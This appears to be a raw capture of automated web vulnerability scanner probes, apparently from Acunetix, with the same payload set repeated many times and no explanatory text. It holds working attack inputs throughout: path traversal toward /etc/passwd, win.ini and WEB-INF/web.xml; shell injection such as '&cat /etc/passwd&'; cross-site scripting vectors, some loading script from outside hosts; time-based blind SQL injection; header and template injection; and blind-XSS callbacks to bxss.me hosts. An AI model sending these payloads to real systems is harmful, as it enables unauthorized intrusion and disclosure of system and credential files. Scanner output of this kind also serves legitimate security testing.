................etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

b7VmkRK5'

1

&dir

1

comments

1

1

http://www.acunetix.tst

1

p5yjIOlh')

1

'"

comments

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(937027)</ScRiPt>

1

g3j1ELRR'))

'&dir&'

comments/.

<!--

1

1

'"()&%<ScRiPt >prompt(970844)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"&dir&"

1

1

1_999803

1

1

WEB-INF/web.xml

|dir

1

1

1

'|dir

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

acu2027<s1﹥s2ʺs3ʹuca2027

1

1

../../../../../../../../../../boot.ini

1

1

1

acux3998z1z2abcxuca3998

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(912450)</ScRiPt>

1

windowswin.ini

1

1

1

1<script>prompt(973765)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(998526)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969006></ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(919113)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(958404)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939647)"></g></svg>

response.write(9150351*9699256)

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(920633))>

'+response.write(9150351*9699256)+'

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

"+response.write(9150351*9699256)+"

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(954838)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960118)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(938744)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

`cat /etc/passwd`

-1

1<img/src=">" onerror=alert(997587)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(978301)</sCripT>

-1)

1

1

${100405+100334}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1&n931816=v932337

1

1some_inexistent_file_with_long_name%00.jpg

1

<img acu onmouseover=prompt(904637) //>

1

5o7U5umd'

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(913811)>

tdnyLMgp')

1

1

/etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

'"()

<a href='http://www.acunetix.com'>website security</a>

'

WJMvbUR6'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

^(#$!@#$)(()))******

'

1

1

[url=http://www.acunetix.com]website security[/url]

"

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1_7yWo1 <ScRiPt >prompt(940942)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

-1)

||cat /etc/passwd

1

1

1

................etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

&dir

http://hitMyGLlU49Uv.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

xpkTH7cG'

1

file:///etc/passwd

1

1

1

'&dir&'

comments

1

/\../\../\../\../\../\../\../etc/passwd

l9A5BfnK')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

comments

'"

"&dir&"

WEB-INF/web.xml

pn2XBG2X'))

1

1

1'"()&%<ScRiPt >prompt(965179)</ScRiPt>

1

<!--

comments/.

WEB-INF\web.xml

|dir

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(979573)</ScRiPt>

../../../../../../../../../../windows/win.ini

'|dir

1

1

1

1

1

../../../../../../../../../../boot.ini

1_946381

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu3406<s1﹥s2ʺs3ʹuca3406

windowswin.ini

1

1

acux2056z1z2abcxuca2056

1

1

................windowswin.ini

1<ScRiPt >prompt(940854)</ScRiPt>

1

1

1<script>prompt(910404)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(918950)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978616></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt >prompt(972180)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(935091)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943054)"></g></svg>

1

1<div style=width:expression(prompt(925635))>

1

1

1

response.write(9912149*9212313)

WEB-INF/web.xml

1

1<iframe src='data:text/html

'+response.write(9912149*9212313)+'

1

&cat /etc/passwd&

1<body onload=prompt(942171)>

WEB-INF\web.xml

1

1

'&cat /etc/passwd&'

"+response.write(9912149*9212313)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948802)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(921883)>

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(916243)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

-1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1<ScRiPt%20>prompt(907274)</sCripT>

1

${99478+99656}

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n965201=v966589

1

'|'ld

<img acu onmouseover=prompt(902934) //>

Igu1LU8d'

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(944951)>

1

1

1

"|"ld

F8uYzKUR')

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

1

1

oVakpkr8'))

.\./.\./.\./.\./.\./.\./etc/passwd

^(#$!@#$)(()))******

'"()

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

'

'

1

-1

1

/etc/passwd

1

1

1

-1)

1_f1CPN <ScRiPt >prompt(956178)</ScRiPt>

"

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

-1))

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitup0JuuVpEx.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

k5sVOeZB'

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

xrhrqDZ5')

'&dir&'

1

comments

http://www.acunetix.tst

1

1

1

'"

MGqlnYg8'))

1'"()&%<ScRiPt >prompt(936585)</ScRiPt>

"&dir&"

comments

1

1

file:///etc/passwd

1

<!--

1

1

comments/.

'"()&%<ScRiPt >prompt(910525)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

1_970305

1

1

1

1

WEB-INF/web.xml

'|dir

acu2064<s1﹥s2ʺs3ʹuca2064

WEB-INF\web.xml

1

"|dir

1

1

acux9836z1z2abcxuca9836

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(985602)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(959668)</script>

windowswin.ini

1

1

1<ScRiPt >prompt(913916)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972903></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(977762)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(983404)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989910)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(958697))>

1

1

response.write(9784906*9538300)

1

1<iframe src='data:text/html

1

'+response.write(9784906*9538300)+'

WEB-INF/web.xml

1

1<body onload=prompt(907260)>

1

1

"+response.write(9784906*9538300)+"

&cat /etc/passwd&

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943239)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(991296)>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img/src=">" onerror=alert(938128)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

${99283+99268}

1<ScRiPt%20>prompt(996757)</sCripT>

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1

1&n972207=v956152

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

-1

1

)

1

<img acu onmouseover=prompt(926701) //>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

-1)

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(915624)>

1

.\./.\./.\./.\./.\./.\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

-1))

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

'"()

1

testasp.vulnweb.com

'

"|"ld

UmK9EzPL'

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

6McsteQw')

${@print(md5(acunetix_wvs_security_test))}

1

1

1_CS3Th <ScRiPt >prompt(909214)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

02qwq7Wg'))

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

................etc/passwd

1

1

-1

"

acunetix_wvs_invalid_filename

http://hituA0MsTb1pk.bxss.me/

1

1

1

1

1

-1)

comments

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

1

&dir

http://www.acunetix.tst

comments

-1))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(910879)</ScRiPt>

'&dir&'

comments/.

1

1

9c3Ik1pv'

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(927399)</ScRiPt>

1

"&dir&"

1

1

nNBde2jX')

WEB-INF\web.xml

1

1_964402

1

1

|dir

1

krIv7pDe'))

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

../../../../../../../../../../boot.ini

acu7739<s1﹥s2ʺs3ʹuca7739

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3116z1z2abcxuca3116

1

1

1

windowswin.ini

1<ScRiPt >prompt(953405)</ScRiPt>

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(937439)</script>

1

1

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(912627)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944240></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(922820)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(946594)">

1

1

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906328)"></g></svg>

1

1<div style=width:expression(prompt(981841))>

response.write(9801353*9263219)

WEB-INF\web.xml

1

1

1

'+response.write(9801353*9263219)+'

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1

../../../../../../../../../../etc/passwd

"+response.write(9801353*9263219)+"

1<body onload=prompt(928991)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916227)>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

${99610+99730}

1

1<img src=xyz OnErRor=prompt(924180)>

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(959238)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1&n948464=v969599

1

1<ScRiPt%20>prompt(928110)</sCripT>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

1

1&lt

-1)

testasp.vulnweb.com

"|"ld

1

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

1

<img acu onmouseover=prompt(928670) //>

'"()

-1))

1

/etc/passwd

1

'

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(923635)>

1

'

9svG4DDu'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

Uk740LA2')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

6c3wGfKN'))

1_Hw1pM <ScRiPt >prompt(942687)</ScRiPt>

1

1

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://hit9dKS4LVJ0m.bxss.me/

&dir

-1

1

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

'&dir&'

1

1

1

comments

1

-1))

file:///etc/passwd

1

1

http://www.acunetix.tst

"&dir&"

'"

comments

1

HVYtRXbM'

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(912725)</ScRiPt>

|dir

<!--

'"()&%<ScRiPt >prompt(924392)</ScRiPt>

1

comments/.

hl3A8u6M')

1

1

WEB-INF/web.xml

'|dir

1

szmnYJ0d'))

1_977668

1

1

1

WEB-INF\web.xml

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu2521<s1﹥s2ʺs3ʹuca2521

1

../../../../../../../../../../boot.ini

1

1

1

acux4296z1z2abcxuca4296

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(925494)</ScRiPt>

1

windowswin.ini

1

................windowswin.ini

1<script>prompt(952147)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(932977)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915930></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(912807)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(923038)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929631)"></g></svg>

1

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(957957))>

1

response.write(9393487*9757303)

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

'+response.write(9393487*9757303)+'

1

1

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(965456)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9393487*9757303)+"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933326)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(994080)>

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(958607)>

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

${100077+100023}

1<ScRiPt%20>prompt(962619)</sCripT>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1

1&lt

-1))

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n958571=v936319

)

1

<img acu onmouseover=prompt(936683) //>

1

ozLHGO9G'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(964153)>

AI7t3Zul')

1

"|"ld

/etc/passwd

1

jBCUH4LE'))

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

[url=http://www.acunetix.com]website security[/url]

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

'

1_2bdxJ <ScRiPt >prompt(944586)</ScRiPt>

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

http://hitKMtXOI4Q6o.bxss.me/

-1))

................etc/passwd

1

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

MdKUX1HV'

||cat /etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

1

1

LUVD66ZN')

1

1

&dir

file:///etc/passwd

comments

1

'"

1

1

ENd01I6X'))

1'"()&%<ScRiPt >prompt(953359)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

comments/.

1

WEB-INF/web.xml

<!--

1

1

'"()&%<ScRiPt >prompt(983601)</ScRiPt>

1

"&dir&"

1

1

WEB-INF\web.xml

1

1_985118

1

1

1

1

../../../../../../../../../../windows/win.ini

|dir

1

1

1

acu4347<s1﹥s2ʺs3ʹuca4347

../../../../../../../../../../boot.ini

1

'|dir

1

1

1

acux7779z1z2abcxuca7779

../../../../../../../../../../windows/win.ini.jpg

1

1

1

"|dir

1<ScRiPt >prompt(954337)</ScRiPt>

1

1

1

windowswin.ini

1<script>prompt(920011)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(916392)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942209></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(912788)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(922279)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944365)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9212772*9056803)

1<div style=width:expression(prompt(986107))>

1

&cat /etc/passwd&

1

'+response.write(9212772*9056803)+'

1<iframe src='data:text/html

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9212772*9056803)+"

1

1<body onload=prompt(922694)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928053)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img src=xyz OnErRor=prompt(950116)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(913494)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

${99954+99751}

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(994393)</sCripT>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1&n972200=v980400

1&lt

1

-1)

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<img acu onmouseover=prompt(942836) //>

'|'ld

-1))

1

1

!(()&&!|*|*|

1

'"()

1<input autofocus onfocus=prompt(951989)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

GryKD2ZQ'

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'

1

1

[url=http://www.acunetix.com]website security[/url]

.\./.\./.\./.\./.\./.\./etc/passwd

GoPU57jR')

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1_qyH0D <ScRiPt >prompt(925180)</ScRiPt>

'

lTOi7B5W'))

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

"

1

1

-1

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hitOJkwnqMhXI.bxss.me/

1

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

-1))

comments

1

&dir

................etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

comments

'"

VK40yE64'

1

'&dir&'

1

1'"()&%<ScRiPt >prompt(962388)</ScRiPt>

1

comments/.

1

<!--

G2KNCdWL')

1

"&dir&"

file:///etc/passwd

'"()&%<ScRiPt >prompt(951824)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

LZENK4Ke'))

|dir

1

1

1

1

WEB-INF/web.xml

1

1_955482

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

acu9250<s1﹥s2ʺs3ʹuca9250

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4817z1z2abcxuca4817

1

1

1

1

windowswin.ini

1<ScRiPt >prompt(909172)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(908024)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(918364)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954068></ScRiPt>

1

1

1<ScRiPt >prompt(976053)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(933304)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921315)"></g></svg>

1

1

response.write(9025564*9257958)

1<div style=width:expression(prompt(902899))>

1

1

1<iframe src='data:text/html

'+response.write(9025564*9257958)+'

1

1

"+response.write(9025564*9257958)+"

&cat /etc/passwd&

1<body onload=prompt(944094)>

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927297)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3.063),0)/*'XOR(if(now()=sysdate(),sleep(3.063),0))OR'"XOR(if(now()=sysdate(),sleep(3.063),0))OR"*/

1<img src=xyz OnErRor=prompt(984589)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(912664)>

1

(select(0)from(select(sleep(3.063)))v)/*'+(select(0)from(select(sleep(3.063)))v)+'"+(select(0)from(select(sleep(3.063)))v)+"*/

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(999286)</sCripT>

-1

1

${100284+99709}

1

1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1)

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

<img acu onmouseover=prompt(966660) //>

1

1&n969967=v956522

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

-1))

)

'"()

1

